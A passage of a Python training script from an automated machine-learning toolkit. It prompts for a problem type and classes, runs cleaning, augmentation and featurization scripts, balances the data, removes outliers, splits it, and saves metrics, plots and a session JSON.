from tqdm import tqdm
from sklearn import metrics
from sklearn.metrics import roc_curve
from pyfiglet import Figlet
f=Figlet(font='doh')
print(f.renderText('Allie'))
f=Figlet(font='doom')
import pandas as pd
import matplotlib.pyplot as plt
###############################################################
## CREATE HELPER FUNCTIONS ##
###############################################################
def most_common(lst):
'''
get most common item in a list
'''
return max(set(lst), key=lst.count)
def prev_dir(directory):
g=directory.split('/')
dir_=''
for i in range(len(g)):
if i != len(g)-1:
if i==0:
dir_=dir_+g[i]
else:
dir_=dir_+'/'+g[i]
# print(dir_)
return dir_
def get_folders(listdir):
folders=list()
for i in range(len(listdir)):
if listdir[i].find('.') < 0:
folders.append(listdir[i])
return folders
def classifyfolder(listdir):
filetypes=list()
for i in range(len(listdir)):
if listdir[i].endswith(('.mp3', '.wav')):
filetypes.append('audio')
elif listdir[i].endswith(('.png', '.jpg')):
filetypes.append('image')
elif listdir[i].endswith(('.txt')):
filetypes.append('text')
elif listdir[i].endswith(('.mp4', '.avi')):
filetypes.append('video')
elif listdir[i].endswith(('.csv')):
filetypes.append('csv')
counts={'audio': filetypes.count('audio'),
'image': filetypes.count('image'),
'text': filetypes.count('text'),
'video': filetypes.count('video'),
'csv': filetypes.count('csv')}
# get back the type of folder (main file type)
countlist=list(counts)
countvalues=list(counts.values())
maxvalue=max(countvalues)
maxind=countvalues.index(maxvalue)
return countlist[maxind]
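# Illustrative example: classifyfolder(['a.wav', 'b.wav', 'notes.txt']) returns 'audio',
# since audio files are the most common file type in the listing.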
def pull_element(mylist, element):
pull_=list()
for i in range(len(mylist)):
pull_.append(mylist[i][element])
return pull_
def convert_csv(X_train, y_train, labels, mtype, classes):
'''
	Take in an array of features and labels and output a
	pandas DataFrame format for easy .CSV export and for model training.
This is important to make sure all machine learning training sessions
use the same dataset (so they can be benchmarked appropriately).
'''
# from pandas merging guide https://pandas.pydata.org/pandas-docs/stable/user_guide/merging.html
feature_list=labels
data=list()
for i in tqdm(range(len(X_train)), desc='converting csv...'):
newlist=list()
for j in range(len(X_train[i])):
newlist.append([X_train[i][j]])
temp=pd.DataFrame(dict(zip(feature_list,newlist)), index=[i])
# print(temp)
data.append(temp)
data = pd.concat(data)
if mtype == 'c':
data['class_']=y_train
elif mtype == 'r':
if len(classes) == 1:
data[classes[0]]=y_train
else:
for j in range(len(classes)):
newy=pull_element(y_train, j)
data[classes[j]]=newy
data=pd.DataFrame(data, columns = list(data))
# print this because in pretty much every case you will write the .CSV file afterwards
print('writing csv file...')
return data
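# Illustrative call (hypothetical values):
# convert_csv([[0.1, 0.2]], [1], ['f1', 'f2'], 'c', ['one', 'two'])
# returns a DataFrame with columns f1, f2 and class_, ready for .to_csv().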
def device_info():
cpu_data={'memory':psutil.virtual_memory(),
'cpu percent':psutil.cpu_percent(),
'cpu times':psutil.cpu_times(),
'cpu count':psutil.cpu_count(),
'cpu stats':psutil.cpu_stats(),
'cpu swap':psutil.swap_memory(),
'partitions':psutil.disk_partitions(),
'disk usage':psutil.disk_usage('/'),
'disk io counters':psutil.disk_io_counters(),
'battery':psutil.sensors_battery(),
'boot time':psutil.boot_time(),
}
data={'time':datetime.datetime.now().strftime("%Y-%m-%d %H:%M"),
'timezone':time.tzname,
'operating system': platform.system(),
'os release':platform.release(),
'os version':platform.version(),
'cpu data':cpu_data,
'space left': list(psutil.disk_usage('/'))[2]/1000000000}
return data
def get_metrics(clf, problemtype, mtype, default_training_script, common_name, X_test, y_test, classes, modelname, settings, model_session, transformer_name, created_csv_files, test_data, model_start_time):
'''
	get the metrics associated with a classification or regression problem
and output a .JSON file with the training session.
'''
metrics_=dict()
y_true=y_test
if default_training_script not in ['autogluon', 'autokeras', 'autopytorch', 'alphapy', 'atm', 'keras', 'devol', 'ludwig', 'safe', 'neuraxle']:
y_pred=clf.predict(X_test)
elif default_training_script=='alphapy':
# go to the right folder
curdir=os.getcwd()
print(os.listdir())
os.chdir(common_name+'_alphapy_session')
alphapy_dir=os.getcwd()
os.chdir('input')
os.rename('test.csv', 'predict.csv')
os.chdir(alphapy_dir)
os.system('alphapy --predict')
os.chdir('output')
listdir=os.listdir()
for k in range(len(listdir)):
if listdir[k].startswith('predictions'):
csvfile=listdir[k]
y_pred=pd.read_csv(csvfile)['prediction']
os.chdir(curdir)
elif default_training_script == 'autogluon':
from autogluon import TabularPrediction as task
test_data=test_data.drop(labels=['class'],axis=1)
y_pred=clf.predict(test_data)
elif default_training_script == 'autokeras':
y_pred=clf.predict(X_test).flatten()
elif default_training_script == 'autopytorch':
y_pred=clf.predict(X_test).flatten()
elif default_training_script == 'atm':
curdir=os.getcwd()
os.chdir('atm_temp')
data = pd.read_csv('test.csv').drop(labels=['class_'], axis=1)
y_pred = clf.predict(data)
os.chdir(curdir)
elif default_training_script == 'ludwig':
data=pd.read_csv('test.csv').drop(labels=['class_'], axis=1)
pred=clf.predict(data)['class__predictions']
y_pred=np.array(list(pred), dtype=np.int64)
elif default_training_script == 'devol':
X_test=X_test.reshape(X_test.shape+ (1,)+ (1,))
y_pred=clf.predict_classes(X_test).flatten()
elif default_training_script=='keras':
if mtype == 'c':
y_pred=clf.predict_classes(X_test).flatten()
elif mtype == 'r':
y_pred=clf.predict(X_test).flatten()
elif default_training_script=='neuraxle':
y_pred=clf.transform(X_test)
elif default_training_script=='safe':
# have to make into a pandas dataframe
test_data=pd.read_csv('test.csv').drop(columns=['class_'], axis=1)
y_pred=clf.predict(test_data)
print(y_pred)
# get classification or regression metrics
if mtype in ['c', 'classification']:
# now get all classification metrics
mtype='classification'
metrics_['accuracy']=metrics.accuracy_score(y_true, y_pred)
metrics_['balanced_accuracy']=metrics.balanced_accuracy_score(y_true, y_pred)
try:
metrics_['precision']=metrics.precision_score(y_true, y_pred)
except:
metrics_['precision']='n/a'
try:
metrics_['recall']=metrics.recall_score(y_true, y_pred)
except:
metrics_['recall']='n/a'
try:
			metrics_['f1_score']=metrics.f1_score(y_true, y_pred, pos_label=1)
except:
metrics_['f1_score']='n/a'
try:
metrics_['f1_micro']=metrics.f1_score(y_true, y_pred, average='micro')
except:
metrics_['f1_micro']='n/a'
try:
metrics_['f1_macro']=metrics.f1_score(y_true, y_pred, average='macro')
except:
metrics_['f1_macro']='n/a'
try:
metrics_['roc_auc']=metrics.roc_auc_score(y_true, y_pred)
except:
metrics_['roc_auc']='n/a'
try:
metrics_['roc_auc_micro']=metrics.roc_auc_score(y_true, y_pred, average='micro')
except:
metrics_['roc_auc_micro']='n/a'
try:
metrics_['roc_auc_macro']=metrics.roc_auc_score(y_true, y_pred, average='macro')
except:
			metrics_['roc_auc_macro']='n/a'
metrics_['confusion_matrix']=metrics.confusion_matrix(y_true, y_pred).tolist()
metrics_['classification_report']=metrics.classification_report(y_true, y_pred, target_names=classes)
plot_confusion_matrix(np.array(metrics_['confusion_matrix']), classes)
try:
			# predict_proba only works for log loss and modified Huber loss.
# https://stackoverflow.com/questions/47788981/sgdclassifier-with-predict-proba
try:
y_probas = clf.predict_proba(X_test)[:, 1]
except:
try:
y_probas = clf.decision_function(X_test)[:, 1]
except:
print('error making y_probas')
plot_roc_curve(y_test, [y_probas], [default_training_script])
except:
print('error plotting ROC curve')
			print('predict_proba only works for log loss and modified Huber loss.')
elif mtype in ['r', 'regression']:
# now get all regression metrics
mtype='regression'
metrics_['mean_absolute_error'] = metrics.mean_absolute_error(y_true, y_pred)
metrics_['mean_squared_error'] = metrics.mean_squared_error(y_true, y_pred)
metrics_['median_absolute_error'] = metrics.median_absolute_error(y_true, y_pred)
metrics_['r2_score'] = metrics.r2_score(y_true, y_pred)
plot_regressor(clf, classes, X_test, y_test)
data={'sample type': problemtype,
'training time': time.time()-model_start_time,
'created date': str(datetime.datetime.now()),
'device info': device_info(),
'session id': model_session,
'classes': classes,
'problem type': mtype,
'model name': modelname,
'model type': default_training_script,
'metrics': metrics_,
'settings': settings,
'transformer name': transformer_name,
'training data': created_csv_files,
'sample X_test': X_test[0].tolist(),
'sample y_test': y_test[0].tolist()}
if modelname.endswith('.pickle'):
jsonfilename=modelname[0:-7]+'.json'
elif modelname.endswith('.h5'):
jsonfilename=modelname[0:-3]+'.json'
else:
jsonfilename=modelname+'.json'
jsonfile=open(jsonfilename,'w')
json.dump(data,jsonfile)
jsonfile.close()
# also output requirements.txt for reproducibilty purposes
curdir=os.getcwd()
basedir=prev_dir(curdir)
os.chdir(basedir)
os.system('pip3 freeze -> requirements.txt')
# FUTURE - add in optional copy of cleaning, augmentation, and feature libraries contextually
# try:
# shutil.copytree(prev_dir(prev_dir(basedir))+'/features', basedir+'/features')
# except:
# print('error copying features')
# try:
# shutil.copytree(prev_dir(prev_dir(basedir))+'/cleaning', basedir+'/cleaning')
# except:
# print('error copying cleaning techniques')
# shutil.copytree(prev_dir(prev_dir(basedir))+'/augmentation', basedir+'/augmentation')
# except:
# print('error copying augmentation techniques')
os.chdir(curdir)
def plot_roc_curve(y_test, probs, clf_names):
'''
This function plots an ROC curve with the appropriate
list of classifiers.
'''
cycol = itertools.cycle('bgrcmyk')
for i in range(len(probs)):
print(y_test)
print(probs[i])
try:
fper, tper, thresholds = roc_curve(y_test, probs[i])
plt.plot(fper, tper, color=next(cycol), label=clf_names[i]+' = %s'%(str(round(metrics.auc(fper, tper), 3))))
plt.plot([0, 1], [0, 1], color='darkblue', linestyle='--')
except:
print('passing %s'%(clf_names[i]))
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver Operating Characteristic (ROC) Curve')
plt.legend()
plt.tight_layout()
plt.savefig('roc_curve.png')
plt.close()
def plot_confusion_matrix(cm, classes, normalize=True, title='Confusion matrix', cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("\nNormalized confusion matrix")
else:
print('\nConfusion matrix, without normalization')
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.tight_layout()
plt.savefig('confusion_matrix.png')
plt.close()
def plot_regressor(regressor, classes, X_test, y_test):
'''
plot regression models with a bar chart.
'''
try:
y_pred = regressor.predict(X_test)
# plot the first 25 records
if len(classes) == 2:
df = pd.DataFrame({'Actual': y_test.flatten(), 'Predicted': y_pred.flatten()})
df1 = df.head(25)
df1.plot(kind='bar',figsize=(16,10))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.tight_layout()
plt.savefig('bar_graph_predictions.png')
plt.close()
# plot a straight line on the data
plt.scatter(X_test, y_test, color='gray')
plt.plot(X_test, y_pred, color='red', linewidth=2)
plt.tight_layout()
plt.savefig('straight_line_predictions.png')
plt.close()
else:
# multi-dimensional generalization
df = pd.DataFrame({'Actual': y_test, 'Predicted': y_pred})
df1 = df.head(25)
df1.plot(kind='bar',figsize=(10,8))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.tight_layout()
plt.savefig('bar_graph_predictions.png')
plt.close()
except:
print('error plotting regressor')
def pursue_modeling(mtype, model_dir, problemtype, default_training_script,common_name_model):
'''
simple script to decide whether or not to continue modeling the data.
'''
try:
model_listdir=os.listdir(model_dir+'/'+problemtype+'_models')
except:
model_listdir=list()
# note that these are tpot definitions
model_exists=False
if default_training_script == 'tpot':
if common_name_model + '_classifier' in model_listdir and mtype == 'c':
model_exists=True
elif common_name_model +'_regression' in model_listdir and mtype == 'r':
model_exists=True
else:
# only look for naming conflicts with TPOT for now, can expand into the future.
model_exists=False
return model_exists, model_listdir
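# Usage sketch (hypothetical names): for an audio classification problem trained with TPOT,
#   model_exists, model_listdir = pursue_modeling('c', model_dir, 'audio', 'tpot', 'gender_tpot')
# returns True when e.g. 'gender_tpot_classifier' already sits in the audio_models folder,
# which lets the training loop below skip that session.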
def get_csvfiles(listdir):
csvfiles=list()
for i in range(len(listdir)):
if listdir[i].endswith('.csv'):
csvfiles.append(listdir[i])
return csvfiles
###############################################################
## LOADING SETTINGS ##
###############################################################
# load the default feature set
cur_dir = os.getcwd()
prevdir= prev_dir(cur_dir)
sys.path.append(prevdir+'/train_dir')
settings=json.load(open(prevdir+'/settings.json'))
# get all the default feature arrays
default_audio_features=settings['default_audio_features']
default_text_features=settings['default_text_features']
default_image_features=settings['default_image_features']
default_video_features=settings['default_video_features']
default_csv_features=settings['default_csv_features']
create_csv=settings['create_csv']
# prepare training and testing data (should have been already featurized) - # of classes/folders
os.chdir(prevdir+'/train_dir')
data_dir=os.getcwd()
listdir=os.listdir()
folders=get_folders(listdir)
csvfiles=get_csvfiles(listdir)
# now assess folders by content type
data=dict()
for i in range(len(folders)):
os.chdir(folders[i])
listdir=os.listdir()
filetype=classifyfolder(listdir)
data[folders[i]]=filetype
os.chdir(data_dir)
###############################################################
## INITIALIZE CLASSES ##
###############################################################
# get all information from sys.argv, and if not,
# go through asking user for the proper parameters
try:
problemtype=sys.argv[1]
mtype=sys.argv[3]
if mtype == 'c':
classnum=sys.argv[2]
common_name=sys.argv[4]
classes=list()
for i in range(int(classnum)):
classes.append(sys.argv[i+5])
else:
classnum=1
problemtype='csv'
mtype=sys.argv[1]
csvfile=sys.argv[2]
classes=[sys.argv[3]]
common_name=csvfile[0:-4]
except:
# now ask user what type of problem they are trying to solve
mtype=input('is this a classification (c) or regression (r) problem? \n')
while mtype not in ['c','r']:
print('input not recognized...')
mtype=input('is this a classification (c) or regression (r) problem? \n')
if mtype == 'c':
problemtype=input('what problem are you solving? (1-audio, 2-text, 3-image, 4-video, 5-csv)\n')
while problemtype not in ['1','2','3','4','5']:
print('answer not recognized...')
problemtype=input('what problem are you solving? (1-audio, 2-text, 3-image, 4-video, 5-csv)\n')
if problemtype=='1':
problemtype='audio'
elif problemtype=='2':
problemtype='text'
elif problemtype=='3':
problemtype='image'
elif problemtype=='4':
problemtype='video'
elif problemtype=='5':
problemtype='csv'
if problemtype != 'csv':
print('\n OK cool, we got you modeling %s files \n'%(problemtype))
count=0
availableclasses=list()
for i in range(len(folders)):
if data[folders[i]]==problemtype:
availableclasses.append(folders[i])
count=count+1
classnum=input('how many classes would you like to model? (%s available) \n'%(str(count)))
print('these are the available classes: ')
print(availableclasses)
# select every available class if the user enters 'all' (useful when there are many classes)
classes=list()
if classnum=='all':
for i in range(len(availableclasses)):
classes.append(availableclasses[i])
else:
stillavailable=list()
for i in range(int(classnum)):
class_=input('what is class #%s \n'%(str(i+1)))
while class_ not in availableclasses and class_ not in '' or class_ in classes:
print('\n')
print('------------------ERROR------------------')
print('the input class does not exist (for %s files).'%(problemtype))
print('these are the available classes: ')
if len(stillavailable)==0:
print(availableclasses)
else:
print(stillavailable)
print('------------------------------------')
class_=input('what is class #%s \n'%(str(i+1)))
stillavailable=list()
for j in range(len(availableclasses)):
if availableclasses[j] not in classes:
stillavailable.append(availableclasses[j])
if class_ == '':
class_=stillavailable[0]
classes.append(class_)
elif problemtype == 'csv':
print('\n OK cool, we got you modeling %s files \n'%(problemtype))
print('csv file options are: %s \n'%(csvfiles))
csvfile=input('which csvfile would you like to use for classification? \n')
g=pd.read_csv(csvfile)
columns=list(g)
print('potential targets include: %s'%(columns))
target=input('what target would you like to use? \n')
csv_labels=g[target]
csv_features=g.drop([target], axis=1)
elif mtype =='r':
# for regression problems we need a target column to predict / classes from a .CSV
problemtype='csv'
# assumes the .CSV file is in the train dir
os.chdir(prevdir+'/train_dir')
listdir=os.listdir()
csvfiles=list()
for i in range(len(listdir)):
if listdir[i].endswith('.csv'):
csvfiles.append(listdir[i])
csvfile=input('what is the name of the spreadsheet (in ./train_dir) used for prediction? \n\n available: %s\n\n'%(str(csvfiles)))
while csvfile not in csvfiles:
print('answer not recognized...')
csvfile=input('what is the name of the spreadsheet (in ./train_dir) used for prediction? \n\n available: %s\n\n'%(str(csvfiles)))
# the available classes are only the numeric columns from the spreadsheet
data = pd.read_csv(csvfile)
columns = list(data)
availableclasses=list()
for i in range(len(columns)):
# look at filetype extension in each column
coldata=data[columns[i]]
sampletypes=list()
for j in range(len(coldata)):
try:
values=float(coldata[j])
sampletypes.append('numerical')
except:
if coldata[j].endswith('.wav'):
sampletypes.append('audio')
elif coldata[j].endswith('.txt'):
sampletypes.append('text')
elif coldata[j].endswith('.png'):
sampletypes.append('image')
elif coldata[j].endswith('.mp4'):
sampletypes.append('video')
else:
sampletypes.append('other')
coltype=most_common(sampletypes)
# correct the other category if needed
if coltype == 'other':
# if coltype.endswith('.csv'):
# coltype='csv'
if len(set(list(coldata))) < 10:
coltype='categorical'
else:
# 10 or more unique values --> interpret this column as free (typed) text input
coltype='typedtext'
if coltype == 'numerical':
availableclasses.append(columns[i])
if len(availableclasses) > 0:
classnum=input('how many classes would you like to model? (%s available) \n'%(str(len(availableclasses))))
print('these are the available classes: %s'%(str(availableclasses)))
classes=list()
stillavailable=list()
for i in range(int(classnum)):
class_=input('what is class #%s \n'%(str(i+1)))
while class_ not in availableclasses and class_ not in '' or class_ in classes:
print('\n')
print('------------------ERROR------------------')
print('the input class does not exist (for %s files).'%(problemtype))
print('these are the available classes: ')
if len(stillavailable)==0:
print(availableclasses)
else:
print(stillavailable)
print('------------------------------------')
class_=input('what is class #%s \n'%(str(i+1)))
stillavailable=list()
for j in range(len(availableclasses)):
if availableclasses[j] not in classes:
stillavailable.append(availableclasses[j])
if class_ == '':
class_=stillavailable[0]
classes.append(class_)
else:
print('no classes available... ending session')
sys.exit()
common_name=input('what is the 1-word common name for the problem you are working on? (e.g. gender for male/female classification) \n')
###############################################################
## UPGRADE MODULES / LOAD MODULES ##
###############################################################
print('-----------------------------------')
print(' LOADING MODULES ')
print('-----------------------------------')
# upgrade to have the proper scikit-learn version later
os.chdir(cur_dir)
os.system('python3 upgrade.py')
import pandas as pd
from sklearn.model_selection import train_test_split
from tqdm import tqdm
import numpy as np
from sklearn import metrics
from sklearn.metrics import roc_curve
###############################################################
## CLEAN THE DATA ##
###############################################################
clean_data=settings['clean_data']
clean_dir=prevdir+'/cleaning'
if clean_data == True and mtype == 'c':
# only pursue cleaning strategies on directories of files and classification problems
print('-----------------------------------')
print(f.renderText('CLEANING DATA'))
print('-----------------------------------')
for i in range(len(classes)):
if problemtype == 'audio':
# clean audio via default_audio_cleaners
os.chdir(clean_dir+'/audio_cleaning')
elif problemtype == 'text':
# clean text via default_text_cleaners
os.chdir(clean_dir+'/text_cleaning')
elif problemtype == 'image':
# clean images via default_image_cleaners
os.chdir(clean_dir+'/image_cleaning')
elif problemtype == 'video':
# clean video via default_video_cleaners
os.chdir(clean_dir+'/video_cleaning')
elif problemtype == 'csv':
# clean .CSV via default_csv_cleaners
os.chdir(clean_dir+'/csv_cleaning')
os.system('python3 clean.py "%s"'%(data_dir+'/'+classes[i]))
elif clean_data == True and mtype == 'r':
for i in range(len(classes)):
if problemtype == 'csv':
# clean .CSV via default_csv_cleaners
os.chdir(clean_dir+'/csv_cleaning')
os.system('python3 clean.py "%s"'%(data_dir+'/'+classes[i]))
###############################################################
## AUGMENT THE DATA ##
###############################################################
augment_data=settings['augment_data']
augment_dir=prevdir+'/augmentation'
if augment_data == True and mtype == 'c':
# only pursue augmentation strategies on directories of files and classification problems
print('-----------------------------------')
print(f.renderText('AUGMENTING DATA'))
print('-----------------------------------')
for i in range(len(classes)):
if problemtype == 'audio':
# augment audio via default_audio_augmenters
os.chdir(augment_dir+'/audio_augmentation')
elif problemtype == 'text':
# augment text via default_text_augmenters
os.chdir(augment_dir+'/text_augmentation')
elif problemtype == 'image':
# augment images via default_image_augmenters
os.chdir(augment_dir+'/image_augmentation')
elif problemtype == 'video':
# augment video via default_video_augmenters
os.chdir(augment_dir+'/video_augmentation')
elif problemtype == 'csv':
# augment .CSV via default_csv_augmenters
os.chdir(augment_dir+'/csv_augmentation')
os.system('python3 augment.py "%s"'%(data_dir+'/'+classes[i]))
elif augment_data == True and mtype == 'r':
for i in range(len(classes)):
if problemtype == 'csv':
# augment .CSV via default_csv_augmenters
os.chdir(augment_dir+'/csv_augmentation')
os.system('python3 augment.py "%s"'%(data_dir+'/'+classes[i]))
###############################################################
## FEATURIZE FILES ##
###############################################################
# now featurize each class (in proper folder)
if mtype == 'c':
data={}
print('-----------------------------------')
print(f.renderText('FEATURIZING DATA'))
print('-----------------------------------')
if problemtype == 'csv':
# csv features should have already been defined
# need to separate into number of unique classes
csv_labels=g[target]
csv_features=g.drop([target], axis=1)
csv_feature_labels=list(csv_features)
classes=list(set(list(csv_labels)))
for i in range(len(classes)):
class_type = classes[i]
feature_list=list()
label_list=list()
for j in range(len(csv_features)):
if csv_labels[j] == class_type:
feature_list.append(list(csv_features.iloc[j,:]))
label_list.append(csv_feature_labels)
data[class_type]=feature_list
else:
# featurize folders of files (audio/text/image/video) with the default featurizers
for i in range(len(classes)):
class_type=classes[i]
if problemtype == 'audio':
# featurize audio
os.chdir(prevdir+'/features/audio_features')
default_features=default_audio_features
elif problemtype == 'text':
# featurize text
os.chdir(prevdir+'/features/text_features')
default_features=default_text_features
elif problemtype == 'image':
# featurize images
os.chdir(prevdir+'/features/image_features')
default_features=default_image_features
elif problemtype == 'video':
# featurize video
os.chdir(prevdir+'/features/video_features')
default_features=default_video_features
print('-----------------------------------')
print(' FEATURIZING %s'%(classes[i].upper()))
print('-----------------------------------')
os.system('python3 featurize.py "%s"'%(data_dir+'/'+classes[i]))
os.chdir(data_dir+'/'+classes[i])
# load audio features
listdir=os.listdir()
feature_list=list()
label_list=list()
for j in range(len(listdir)):
if listdir[j][-5:]=='.json':
try:
g=json.load(open(listdir[j]))
# consolidate all features into one array (if featurizing with multiple featurizers)
default_feature=list()
default_label=list()
for k in range(len(default_features)):
default_feature=default_feature+g['features'][problemtype][default_features[k]]['features']
default_label=default_label+g['features'][problemtype][default_features[k]]['labels']
feature_list.append(default_feature)
label_list.append(default_label)
except:
print('ERROR - skipping ' + listdir[j])
data[class_type]=feature_list
elif mtype == 'r':
# featurize .CSV
os.chdir(prevdir+'/features/csv_features')
output_file=str(uuid.uuid1())+'.csv'
os.system('python3 featurize_csv_regression.py -i "%s" -o "%s" -t "%s"'%(prevdir+'/train_dir/'+csvfile, prevdir+'/train_dir/'+output_file, classes[0]))
csvfile=output_file
default_features=['csv_regression']
###############################################################
## GENERATE TRAINING DATA ##
###############################################################
print('-----------------------------------')
print(f.renderText('CREATING TRAINING DATA'))
print('-----------------------------------')
# perform class balance such that both classes have the same number
# of members (true by default, but can also be false)
os.chdir(prevdir+'/training/')
model_dir=prevdir+'/models'
balance=settings['balance_data']
remove_outliers=settings['remove_outliers']
outlier_types=settings['default_outlier_detector']
if mtype == 'c':
if problemtype != 'csv':
jsonfile=''
for i in range(len(classes)):
if i==0:
jsonfile=classes[i]
else:
jsonfile=jsonfile+'_'+classes[i]
jsonfile=jsonfile+'.json'
#try:
g=data
alldata=list()
labels=list()
lengths=list()
# check to see all classes are same length and reshape if necessary
for i in range(len(classes)):
class_=g[classes[i]]
lengths.append(len(class_))
lengths=np.array(lengths)
minlength=np.amin(lengths)
# now load all the classes
for i in range(len(classes)):
class_=g[classes[i]]
random.shuffle(class_)
# only balance if specified in settings
if balance==True:
if len(class_) > minlength:
print('%s greater than minlength (%s) by %s, equalizing...'%(classes[i], str(minlength), str(len(class_)-minlength)))
class_=class_[0:minlength]
for j in range(len(class_)):
alldata.append(class_[j])
labels.append(i)
# load features file and get feature labels by loading in classes
labels_dir=prevdir+'/train_dir/'+classes[0]
os.chdir(labels_dir)
listdir=os.listdir()
features_file=''
for i in range(len(listdir)):
if listdir[i].endswith('.json'):
features_file=listdir[i]
labels_=list()
for i in range(len(default_features)):
tlabel=json.load(open(features_file))['features'][problemtype][default_features[i]]['labels']
labels_=labels_+tlabel
elif problemtype == 'csv':
# format data appropriately
jsonfile=target+'.json'
#try:
g=data
alldata=list()
labels=list()
lengths=list()
# check to see all classes are same length and reshape if necessary
for i in range(len(classes)):
class_=g[classes[i]]
lengths.append(len(class_))
lengths=np.array(lengths)
minlength=np.amin(lengths)
# now load all the classes
for i in range(len(classes)):
class_=g[classes[i]]
random.shuffle(class_)
# only balance if specified in settings
if balance==True:
if len(class_) > minlength:
print('%s greater than minlength (%s) by %s, equalizing...'%(classes[i], str(minlength), str(len(class_)-minlength)))
class_=class_[0:minlength]
for j in range(len(class_)):
alldata.append(class_[j])
labels.append(i)
# load features file and get feature labels by loading in classes
labels_=csv_feature_labels
elif mtype == 'r':
regression_data=pd.read_csv(prevdir+'/train_dir/'+csvfile)
print(csvfile)
# get features and labels
features_=regression_data.drop(columns=classes, axis=1)
labels_=list(features_)
labels_csv=regression_data.drop(columns=list(features_), axis=1)
# iterate through each column and make into proper features and labels
features=list()
labels=list()
# testing
# print(len(features_))
# print(len(labels_))
# print(features_)
# print(labels_)
# print(features_.iloc[0,:])
# print(labels_.iloc[0,:])
# get features and labels
for i in range(len(features_)):
features.append(list(features_.iloc[i,:]))
labels.append(list(labels_csv.iloc[i,:]))
# convert to name alldata just to be consistent
alldata=features
# print(alldata[0])
# print(labels[0])
# print(labels_)
os.chdir(model_dir)
# get the split from the settings.json
try:
test_size=settings['test_size']
except:
test_size=0.25
# error checking around lengths of arrays and deleting as necessary
lengths=list()
for i in range(len(alldata)):
lengths.append(len(alldata[i]))
# CLEAN IF DIMENSIONS DO NOT MATCH!!
maxval=max(lengths)
minval=min(lengths)
delete_ind=list()
inds=list()
alldata=np.array(alldata)
labels=np.array(labels)
if maxval != minval:
if lengths.count(maxval) > lengths.count(minval):
for i in range(len(lengths)):
# this means that additional column has been removed
if lengths[i] == minval:
delete_ind.append(i)
elif lengths.count(maxval) < lengths.count(minval):
for i in range(len(lengths)):
# this means that additional column has been added
if lengths[i] == maxval:
delete_ind.append(i)
print('DELETING THESE INDICES: %s'%(str(delete_ind)))
print(alldata.shape)
print(labels.shape)
alldata=np.delete(alldata, tuple(delete_ind), axis=0)
labels=np.delete(labels, tuple(delete_ind))
print(alldata.shape)
print(labels.shape)
# # now see if any element in the array is a NaN and do not include if so in alldata or labels
# for i in range(len(alldata)):
# try:
# array_has_nan = list(np.isnan(np.array(alldata[i]))).count(True)
# array_has_string=list(np.char.isnumeric(np.array(alldata[i]))).count(False)
# except:
# array_has_string=1
# if array_has_nan > 0 or array_has_string > 0:
# inds.append(i)
# print(alldata[i])
# if len(inds) > 0:
# print('DELETING THESE INDICES: %s'%(str(inds)))
# alldata=np.delete(alldata, tuple(inds))
# labels=np.delete(labels, tuple(inds))
# REMOVE OUTLIERS IF SETTING IS TRUE
alldata=np.array(alldata)
labels=np.array(labels)
if remove_outliers==True:
print('-----------------------------------')
print(' REMOVING OUTLIERS')
print('-----------------------------------')
for i in range(len(outlier_types)):
outlier_type=outlier_types[i]
if outlier_type =='isolationforest':
from sklearn.ensemble import IsolationForest
clf = IsolationForest(random_state=0).fit(alldata)
y_pred = clf.predict(alldata)
inlier_ind=list(np.where(y_pred==1))
outlier_ind=list(np.where(y_pred==-1))
y_pred = y_pred.tolist()
print(type(y_pred))
print(type(y_pred[0]))
n_inliers = y_pred.count(1)
n_outliers = y_pred.count(-1)
print(n_inliers)
print(n_outliers)
# shape before
print(alldata.shape)
print(labels.shape)
# delete outliers
alldata=np.delete(alldata, tuple(outlier_ind), axis=0)
labels=np.delete(labels, tuple(outlier_ind))
print(alldata.shape)
print(labels.shape)
elif outlier_type=='zscore':
os.system('pip3 install statsmodels==0.11.1')
from scipy import stats
from statsmodels.formula.api import ols
# https://towardsdatascience.com/ways-to-detect-and-remove-the-outliers-404d16608dba
z = np.abs(stats.zscore(alldata))
# print(z)
threshold = 3
inds=list(set(np.where(z>threshold)[0]))
print(len(inds))
print(tuple(inds))
print(alldata.shape)
print('-->')
alldata = np.delete(alldata, tuple(inds), axis=0)
print(alldata.shape)
labels = np.delete(labels, tuple(inds))
print(len(alldata))
print(len(labels))
# rebalance data to all be the same length
newlabels=list(labels)
outlier_class=list()
for i in range(len(classes)):
outlier_class.append(newlabels.count(i))
lengths=np.array(outlier_class)
minlength=np.amin(outlier_class)
# now load all the classes
for i in range(len(classes)):
# only balance if specified in settings
if balance==True:
count2=newlabels.count(i)
while count2 > minlength:
count2=newlabels.count(i)
print('%s greater than minlength (%s) by %s, equalizing...'%(classes[i], str(minlength), str(count2-minlength)))
ind=list(labels).index(i)
alldata=np.delete(alldata, tuple([ind]), axis=0)
labels=np.delete(labels, tuple([ind]))
newlabels=list(labels)
alldata=list(alldata)
labels=list(labels)
# split the data
X_train, X_test, y_train, y_test = train_test_split(alldata, labels, test_size=test_size)
# convert everything to numpy arrays (for testing later)
X_train=np.array(X_train)
X_test=np.array(X_test)
y_train=np.array(y_train)
y_test=np.array(y_test)
# create list of created csv files
created_csv_files=list()
# create training and testing datasets and save to a .CSV file for archive purposes
# this ensures that all machine learning training methods use the same training data
basefile=common_name
temp_listdir=os.listdir()
if create_csv == True:
try:
print(basefile+'_all.csv'.upper())
if basefile+'_all.csv' not in temp_listdir:
all_data = convert_csv(alldata, labels, labels_, mtype, classes)
all_data.to_csv(basefile+'_all.csv',index=False)
created_csv_files.append(basefile+'_all.csv')
except:
print('error exporting data into excel sheet %s'%(basefile+'_all.csv'))
try:
print(basefile+'_train.csv'.upper())
